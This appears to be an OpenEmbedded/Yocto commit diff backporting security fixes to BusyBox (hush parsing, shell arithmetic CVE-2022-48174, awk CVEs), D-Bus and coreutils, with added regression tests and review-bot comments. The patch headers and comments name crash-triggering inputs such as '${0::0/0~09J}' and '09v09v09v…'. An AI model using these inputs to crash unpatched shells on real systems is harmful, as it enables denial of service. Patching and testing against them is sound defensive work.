+ shell/ash_test/ash-misc/control_char4.right | 1 +
+ shell/ash_test/ash-misc/control_char4.tests | 2 ++
+ shell/hush.c | 11 +++++++++++
+ shell/hush_test/hush-misc/control_char3.right | 1 +
+ shell/hush_test/hush-misc/control_char3.tests | 2 ++
+ shell/hush_test/hush-misc/control_char4.right | 1 +
+ shell/hush_test/hush-misc/control_char4.tests | 2 ++
+ 9 files changed, 23 insertions(+)
+ create mode 100644 shell/ash_test/ash-misc/control_char3.right
+ create mode 100755 shell/ash_test/ash-misc/control_char3.tests
+ create mode 100644 shell/ash_test/ash-misc/control_char4.right
+ create mode 100755 shell/ash_test/ash-misc/control_char4.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char3.right
+ create mode 100755 shell/hush_test/hush-misc/control_char3.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char4.right
+ create mode 100755 shell/hush_test/hush-misc/control_char4.tests
+
+diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right
+new file mode 100644
+index 000000000..283e02cbb
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.right
+@@ -0,0 +1 @@
++SHELL: line 1: : not found
+diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right
+new file mode 100644
+index 000000000..2bf18e684
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.right
+@@ -0,0 +1 @@
++SHELL: line 1: -: not found
+diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+diff --git a/shell/hush.c b/shell/hush.c
+index 9fead37da..249728b9d 100644
+--- a/shell/hush.c
++++ b/shell/hush.c
+@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string,
+ }
+ #endif
+ o_addQchr(dest, ch);
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ /* Convert "^C" to corresponding special variable reference */
++ o_addchr(dest, SPECIAL_VAR_QUOTED_SVS);
++ o_addchr(dest, SPECIAL_VAR_SYMBOL);
++ }
+ goto again;
+ #undef as_string
+ }
+@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring,
+ if (ch == '\n')
+ continue; /* drop \<newline>, get next char */
+ nommu_addchr(&ctx.as_string, '\\');
++ if (ch == SPECIAL_VAR_SYMBOL) {
++ nommu_addchr(&ctx.as_string, ch);
++ /* Convert \^C to corresponding special variable reference */
++ goto case_SPECIAL_VAR_SYMBOL;
++ }
+ o_addchr(&ctx.word, '\\');
+ if (ch == EOF) {
+ /* Testcase: eval 'echo Ok\' */
+@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring,
+ /* Note: nommu_addchr(&ctx.as_string, ch) is already done */
+
+ switch (ch) {
++ case_SPECIAL_VAR_SYMBOL:
+ case SPECIAL_VAR_SYMBOL:
+ /* Convert raw ^C to corresponding special variable reference */
+ o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL);
+diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right
+new file mode 100644
+index 000000000..94b4f8699
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.right
+@@ -0,0 +1 @@
++hush: can't execute '': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right
+new file mode 100644
+index 000000000..698e21427
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.right
+@@ -0,0 +1 @@
++hush: can't execute '-': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+--
+cgit v1.2.3
+
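Review bot: The added test scripts depend on a raw control character. As shown here, `control_char3.tests` runs `$THIS_SH -c '\' SHELL` and expects `SHELL: line 1: : not found`, with nothing visible after the backslash or between the colons. This view may simply not render the byte, but patches carrying raw control characters are easily damaged by mail or web tooling, so it is worth confirming that the stored patch still contains it in all the added `.tests`/`.right` files. In `parse_stream`, the new `case_SPECIAL_VAR_SYMBOL:` label is reached by `goto` from the backslash branch; a comment at the label such as `/* also entered by goto from the backslash case above */` would make that jump into the switch easier to follow.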
diff --git a/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
new file mode 100644
index 0000000000..dfba2a7e0f
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
@@ -0,0 +1,82 @@
+From c18ebf861528ef24958dd99a146482d2a40014c7 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Mon, 12 Jun 2023 17:48:47 +0200
+Subject: [PATCH] shell: avoid segfault on ${0::0/0~09J}. Closes 15216
+
+function old new delta
+evaluate_string 1011 1053 +42
+
+CVE: CVE-2022-48174
+Upstream-Status: Backport [d417193cf37ca1005830d7e16f5fa7e1d8a44209]
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+---
+ shell/math.c | 39 +++++++++++++++++++++++++++++++++++----
+ 1 file changed, 35 insertions(+), 4 deletions(-)
+
+diff --git a/shell/math.c b/shell/math.c
+index af1ab55c0..79824e81f 100644
+--- a/shell/math.c
++++ b/shell/math.c
+@@ -578,6 +578,28 @@ static arith_t strto_arith_t(const char *nptr, char **endptr)
+ # endif
+ #endif
+
++//TODO: much better estimation than expr_len/2? Such as:
++//static unsigned estimate_nums_and_names(const char *expr)
++//{
++// unsigned count = 0;
++// while (*(expr = skip_whitespace(expr)) != '\0') {
++// const char *p;
++// if (isdigit(*expr)) {
++// while (isdigit(*++expr))
++// continue;
++// count++;
++// continue;
++// }
++// p = endofname(expr);
++// if (p != expr) {
++// expr = p;
++// count++;
++// continue;
++// }
++// }
++// return count;
++//}
++
+ static arith_t FAST_FUNC
+ evaluate_string(arith_state_t *math_state, const char *expr)
+ {
+@@ -585,10 +607,12 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ const char *errmsg;
+ const char *start_expr = expr = skip_whitespace(expr);
+ unsigned expr_len = strlen(expr) + 2;
+- /* Stack of integers */
+- /* The proof that there can be no more than strlen(startbuf)/2+1
+- * integers in any given correct or incorrect expression
+- * is left as an exercise to the reader. */
++ /* Stack of integers/names */
++ /* There can be no more than strlen(startbuf)/2+1
++ * integers/names in any given correct or incorrect expression.
++ * (modulo "09v09v09v09v09v" case,
++ * but we have code to detect that early)
++ */
+ var_or_num_t *const numstack = alloca((expr_len / 2) * sizeof(numstack[0]));
+ var_or_num_t *numstackptr = numstack;
+ /* Stack of operator tokens */
+@@ -657,6 +681,13 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ numstackptr->var = NULL;
+ errno = 0;
+ numstackptr->val = strto_arith_t(expr, (char**) &expr);
++ /* A number can't be followed by another number, or a variable name.
++ * We'd catch this later anyway, but this would require numstack[]
++ * to be twice as deep to handle strings where _every_ char is
++ * a new number or name. Example: 09v09v09v09v09v09v09v09v09v
++ */
++ if (isalnum(*expr) || *expr == '_')
++ goto err;
+ if (errno)
+ numstackptr->val = 0; /* bash compat */
+ goto num;
+--
+2.40.1
+
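Review bot: The `numstack` allocation of `expr_len / 2` entries is now safe only because of the new `isalnum(*expr) || *expr == '_'` reject after `strto_arith_t()`, and the visible hunks show no bound check where `numstackptr` advances. The expression text is caller-supplied and the buffer is an `alloca()` on the stack, so a cheap guard at the push would keep a later parser change from reintroducing the overflow, for example `if ((unsigned)(numstackptr - numstack) >= expr_len / 2) goto err;`. The push sites and the `err` label are outside the visible hunks of evaluate_string, so the placement needs confirming against the full function. The commented-out `estimate_nums_and_names()` draft would also read better as a one-sentence TODO than as a block of dead code.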
diff --git a/meta/recipes-core/busybox/busybox_1.31.1.bb b/meta/recipes-core/busybox/busybox_1.31.1.bb
index 7563368287..94aa1467df 100644
--- a/meta/recipes-core/busybox/busybox_1.31.1.bb
+++ b/meta/recipes-core/busybox/busybox_1.31.1.bb
@@ -50,7 +50,15 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \
file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \
file://busybox-CVE-2018-1000500.patch \
file://0001-hwclock-make-glibc-2.31-compatible.patch \
-"
+ file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \
+ file://0001-mktemp-add-tmpdir-option.patch \
+ file://CVE-2021-42374.patch \
+ file://CVE-2021-42376.patch \
+ file://CVE-2021-423xx-awk.patch \
+ file://CVE-2022-48174.patch \
+ file://0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch \
+ file://0002-nslookup-sanitize-all-printed-strings-with-printable.patch \
+ "
SRC_URI_append_libc-musl = " file://musl.cfg "
SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0"
diff --git a/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
new file mode 100644
index 0000000000..7e3d47b88c
--- /dev/null
+++ b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
@@ -0,0 +1,215 @@
+From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001
+From: Sana Kazi <Sana.Kazi@kpit.com>
+Date: Wed, 8 Dec 2021 12:25:34 +0530
+Subject: [PATCH] busybox: Fix multiple security issues in awk
+
+Description: fix multiple security issues in awk
+Origin: backported awk.c from busybox 1.34.1
+
+CVE: CVE-2021-42378
+CVE: CVE-2021-42379
+CVE: CVE-2021-42380
+CVE: CVE-2021-42381
+CVE: CVE-2021-42382
+CVE: CVE-2021-42384
+CVE: CVE-2021-42385
+CVE: CVE-2021-42386
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz]
+
+Comment: Refreshed first hunk and removed few hunks as they are already present in source.
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com>
+
+---
+ editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 60 insertions(+), 20 deletions(-)
+
+diff --git a/editors/awk.c b/editors/awk.c
+index d25508e..4e4f282 100644
+--- a/editors/awk.c
++++ b/editors/awk.c
+@@ -272,7 +272,8 @@ typedef struct tsplitter_s {
+ /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */
+ /* operator is inserted between them */
+ #define TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \
+- | TC_STRING | TC_NUMBER | TC_UOPPOST)
++ | TC_STRING | TC_NUMBER | TC_UOPPOST \
++ | TC_LENGTH)
+ #define TC_CONCAT2 (TC_OPERAND | TC_UOPPRE)
+
+ #define OF_RES1 0x010000
+@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 =
+
+ #define OC_B OC_BUILTIN
+
+-static const uint32_t tokeninfo[] = {
++static const uint32_t tokeninfo[] ALIGN4 = {
+ 0,
+ 0,
+ OC_REGEXP,
+@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected)
+ const uint32_t *ti;
+
+ if (t_rollback) {
++ debug_printf_parse("%s: using rolled-back token\n", __func__);
+ t_rollback = FALSE;
+ } else if (concat_inserted) {
++ debug_printf_parse("%s: using concat-inserted token\n", __func__);
+ concat_inserted = FALSE;
+ t_tclass = save_tclass;
+ t_info = save_info;
+@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected)
+ goto readnext;
+
+ /* insert concatenation operator when needed */
+- if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) {
++ debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__,
++ (ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP));
++ if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)
++ && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */
++ ) {
+ concat_inserted = TRUE;
+ save_tclass = tc;
+ save_info = t_info;
+@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected)
+ t_info = OC_CONCAT | SS | P(35);
+ }
+
++ debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass);
+ t_tclass = tc;
+ }
+ ltclass = t_tclass;
+@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected)
+ EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN);
+ }
+
++ debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double);
+ return ltclass;
+ #undef concat_inserted
+ #undef save_tclass
+@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp)
+ glptr = NULL;
+
+ } else if (tc & (TC_BINOP | TC_UOPPOST)) {
+- debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__);
++ debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc);
+ /* for binary and postfix-unary operators, jump back over
+ * previous operators with higher priority */
+ vn = cn;
+@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp)
+ v = cn->l.v = xzalloc(sizeof(var));
+ if (tc & TC_NUMBER)
+ setvar_i(v, t_double);
+- else
++ else {
+ setvar_s(v, t_string);
++ xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */
++ }
+ break;
+
+ case TC_REGEXP:
+@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp)
+
+ case TC_LENGTH:
+ debug_printf_parse("%s: TC_LENGTH\n", __func__);
+- next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM);
++ next_token(TC_SEQSTART /* length(...) */
++ | TC_OPTERM /* length; (or newline)*/
++ | TC_GRPTERM /* length } */
++ | TC_BINOPX /* length <op> NUM */
++ | TC_COMMA /* print length, 1 */
++ );
+ rollback_token();
+ if (t_tclass & TC_SEQSTART) {
+ /* It was a "(" token. Handle just like TC_BUILTIN */
+@@ -1747,12 +1763,34 @@ static void fsrealloc(int size)
+ nfields = size;
+ }
+
++static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[])
++{
++ int r = regexec(preg, s, 1, pmatch, 0);
++ if (r == 0 && pmatch[0].rm_eo == 0) {
++ /* For example, happens when FS can match
++ * an empty string (awk -F ' *'). Logically,
++ * this should split into one-char fields.
++ * However, gawk 5.0.1 searches for first
++ * _non-empty_ separator string match:
++ */
++ size_t ofs = 0;
++ do {
++ ofs++;
++ if (!s[ofs])
++ return REG_NOMATCH;
++ regexec(preg, s + ofs, 1, pmatch, 0);
++ } while (pmatch[0].rm_eo == 0);
++ pmatch[0].rm_so += ofs;
++ pmatch[0].rm_eo += ofs;
++ }
++ return r;
++}
++
+ static int awk_split(const char *s, node *spl, char **slist)
+ {
+- int l, n;
++ int n;
+ char c[4];
+ char *s1;
+- regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+
+ /* in worst case, each char would be a separate field */
+ *slist = s1 = xzalloc(strlen(s) * 2 + 3);
+@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist)
+ return n; /* "": zero fields */
+ n++; /* at least one field will be there */
+ do {
++ int l;
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
++
+ l = strcspn(s, c+2); /* len till next NUL or \n */
+- if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0
++ if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0
+ && pmatch[0].rm_so <= l
+ ) {
++ /* if (pmatch[0].rm_eo == 0) ... - impossible */
+ l = pmatch[0].rm_so;
+- if (pmatch[0].rm_eo == 0) {
+- l++;
+- pmatch[0].rm_eo++;
+- }
+ n++; /* we saw yet another delimiter */
+ } else {
+ pmatch[0].rm_eo = l;
+ if (s[l])
+ pmatch[0].rm_eo++;
+ }
+- memcpy(s1, s, l);
+- /* make sure we remove *all* of the separator chars */
+- do {
+- s1[l] = '\0';
+- } while (++l < pmatch[0].rm_eo);
+- nextword(&s1);
++ s1 = mempcpy(s1, s, l);
++ *s1++ = '\0';
+ s += pmatch[0].rm_eo;
+ } while (*s);
++
++ /* echo a-- | awk -F-- '{ print NF, length($NF), $NF }'
++ * should print "2 0 ":
++ */
++ *s1 = '\0';
++
+ return n;
+ }
+ if (c[0] == '\0') { /* null split */
+@@ -1995,7 +2035,7 @@ static int ptest(node *pattern)
+ static int awk_getline(rstream *rsm, var *v)
+ {
+ char *b;
+- regmatch_t pmatch[2];
++ regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+ int size, a, p, pp = 0;
+ int fd, so, eo, r, rp;
+ char c, *m, *s;
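Review bot: In `regexec1_nonempty()` the retry loop discards the return value of the second `regexec()` call and then tests `pmatch[0].rm_eo`, whose contents POSIX leaves unspecified when the match fails. The loop is only well-defined if a failed call leaves the earlier zero in place. Capturing the result makes termination explicit: `r = regexec(preg, s + ofs, 1, pmatch, 0);` with the loop condition `while (r != 0 || pmatch[0].rm_eo == 0);`. The header lists eight CVE ids against one combined backport that also adds several `debug_printf_parse()` lines, so a short mapping of CVE to hunk in the description would make later audits easier.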
diff --git a/meta/recipes-core/coreutils/coreutils_8.31.bb b/meta/recipes-core/coreutils/coreutils_8.31.bb
index 0c8452da98..3841f71155 100644
--- a/meta/recipes-core/coreutils/coreutils_8.31.bb
+++ b/meta/recipes-core/coreutils/coreutils_8.31.bb
@@ -26,6 +26,10 @@ SRC_URI_append_libc-musl = "file://strtod_fix_clash_with_strtold.patch"
SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293"
SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd"
+# http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842
+# runcon is not really a sandbox command, use `runcon ... setsid ...` to avoid this particular issue.
+CVE_CHECK_WHITELIST += "CVE-2016-2781"
+
EXTRA_OECONF_class-native = "--without-gmp"
EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}"
EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname"
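Review bot: The `CVE_CHECK_WHITELIST += "CVE-2016-2781"` entry removes the CVE from scan reports without changing `runcon` itself, so the two comment lines above it are the only record of why the finding is accepted. The comment should say outright that nothing is patched and that the mitigation sits with the caller, for example `# Not fixed in code: runcon is not a sandbox; callers that need isolation must use 'runcon ... setsid ...'`. That keeps a later reader from taking the suppressed finding to mean the recipe carries a fix.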
@@ -39,11 +43,15 @@ PACKAGECONFIG_class-target ??= "\
# The lib/oe/path.py requires xattr
PACKAGECONFIG_class-native ??= "xattr"
+# oe-core builds need xattr support
+PACKAGECONFIG_class-nativesdk ??= "xattr"
+
# with, without, depends, rdepends
#
PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl,"
PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr,"
PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,,"
+PACKAGECONFIG[openssl] = "--with-openssl=yes,--with-openssl=no,openssl"
# [ df mktemp nice printenv base64 gets a special treatment and is not included in this
bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \
diff --git a/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index c24295b537..b39f7523c0 100644
--- a/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "A simple tool to wait for a specific signal over DBus"
HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/dbus-wait"
+DESCRIPTION = "${SUMMARY}"
SECTION = "base"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
@@ -10,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
PV = "0.1+git${SRCPV}"
PR = "r2"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
UPSTREAM_CHECK_COMMITS = "1"
S = "${WORKDIR}/git"
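Review bot: The updated `SRC_URI` still fetches over the unauthenticated `git://` transport. The pinned `SRCREV` limits what a network attacker could substitute, but the fetch itself has no transport integrity or server authentication. Since this line is being touched anyway, it could become `SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master;protocol=https"`, provided the server offers HTTPS for this repository.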
diff --git a/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
index bea0e74ed0..755c841bad 100644
--- a/meta/recipes-core/dbus/dbus-test_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
@@ -1,57 +1,31 @@
SUMMARY = "D-Bus test package (for D-bus functionality testing only)"
HOMEPAGE = "http://dbus.freedesktop.org"
SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
-DEPENDS = "dbus glib-2.0"
+require dbus.inc
-RDEPENDS_${PN}-dev = ""
+SRC_URI += "file://run-ptest \
+ file://python-config.patch \
+ "
-SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://run-ptest \
- file://python-config.patch \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- "
+DEPENDS = "dbus glib-2.0"
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
+RDEPENDS_${PN}-dev = ""
S="${WORKDIR}/dbus-${PV}"
FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:"
-inherit autotools pkgconfig gettext ptest upstream-version-is-even
+inherit ptest
-EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}"
-EXTRA_OECONF_X_class-native = "--without-x"
-
-EXTRA_OECONF = "--enable-tests \
+EXTRA_OECONF += "--enable-tests \
--enable-modular-tests \
--enable-installed-tests \
--enable-checks \
--enable-asserts \
- --enable-largefile \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
--with-dbus-test-dir=${PTEST_PATH} \
- ${EXTRA_OECONF_X} \
--enable-embedded-tests \
"
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}"
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
-PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
-
do_install() {
:
}
diff --git a/meta/recipes-core/dbus/dbus.inc b/meta/recipes-core/dbus/dbus.inc
new file mode 100644
index 0000000000..9b5cc53d92
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus.inc
@@ -0,0 +1,36 @@
+inherit autotools pkgconfig gettext upstream-version-is-even
+
+LICENSE = "AFL-2.1 | GPLv2+"
+LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
+ file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
+ file://tmpdir.patch \
+ file://dbus-1.init \
+ file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
+ file://CVE-2023-34969.patch \
+"
+
+SRC_URI[sha256sum] = "bc42d196c1756ac520d61bf3ccd6f42013617def45dd1e591a6091abf51dca38"
+
+EXTRA_OECONF = "--disable-xml-docs \
+ --disable-doxygen-docs \
+ --disable-libaudit \
+ --enable-largefile \
+ --with-system-socket=/run/dbus/system_bus_socket \
+ "
+EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
+EXTRA_OECONF_append_class-native = " --disable-selinux"
+
+PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
+ user-session \
+ "
+PACKAGECONFIG_class-native = ""
+PACKAGECONFIG_class-nativesdk = ""
+
+PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
+PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
+PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
+
+CVE_PRODUCT += "d-bus_project:d-bus freedesktop:dbus freedesktop:libdbus"
diff --git a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
deleted file mode 100644
index ac7a4b7a71..0000000000
--- a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001
-From: Simon McVittie <smcv@collabora.com>
-Date: Thu, 16 Apr 2020 14:45:11 +0100
-Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive
-
-MSG_CTRUNC indicates that we have received fewer fds that we should
-have done because the buffer was too small, but we were treating it
-as though it indicated that we received *no* fds. If we received any,
-we still have to make sure we close them, otherwise they will be leaked.
-
-On the system bus, if an attacker can induce us to leak fds in this
-way, that's a local denial of service via resource exhaustion.
-
-Reported-by: Kevin Backhouse, GitHub Security Lab
-Fixes: dbus#294
-Fixes: CVE-2020-12049
-Fixes: GHSL-2020-057
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63]
-CVE: CVE-2020-12049
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------
- 1 file changed, 20 insertions(+), 12 deletions(-)
-
-diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c
-index b5fc2466..b176dae1 100644
---- a/dbus/dbus-sysdeps-unix.c
-+++ b/dbus/dbus-sysdeps-unix.c
-@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- struct cmsghdr *cm;
- dbus_bool_t found = FALSE;
-
-- if (m.msg_flags & MSG_CTRUNC)
-- {
-- /* Hmm, apparently the control data was truncated. The bad
-- thing is that we might have completely lost a couple of fds
-- without chance to recover them. Hence let's treat this as a
-- serious error. */
--
-- errno = ENOSPC;
-- _dbus_string_set_length (buffer, start);
-- return -1;
-- }
--
- for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm))
- if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS)
- {
-@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- if (!found)
- *n_fds = 0;
-
-+ if (m.msg_flags & MSG_CTRUNC)
-+ {
-+ unsigned int i;
-+
-+ /* Hmm, apparently the control data was truncated. The bad
-+ thing is that we might have completely lost a couple of fds
-+ without chance to recover them. Hence let's treat this as a
-+ serious error. */
-+
-+ /* We still need to close whatever fds we *did* receive,
-+ * otherwise they'll never get closed. (CVE-2020-12049) */
-+ for (i = 0; i < *n_fds; i++)
-+ close (fds[i]);
-+
-+ *n_fds = 0;
-+ errno = ENOSPC;
-+ _dbus_string_set_length (buffer, start);
-+ return -1;
-+ }
-+
- /* put length back (doesn't actually realloc) */
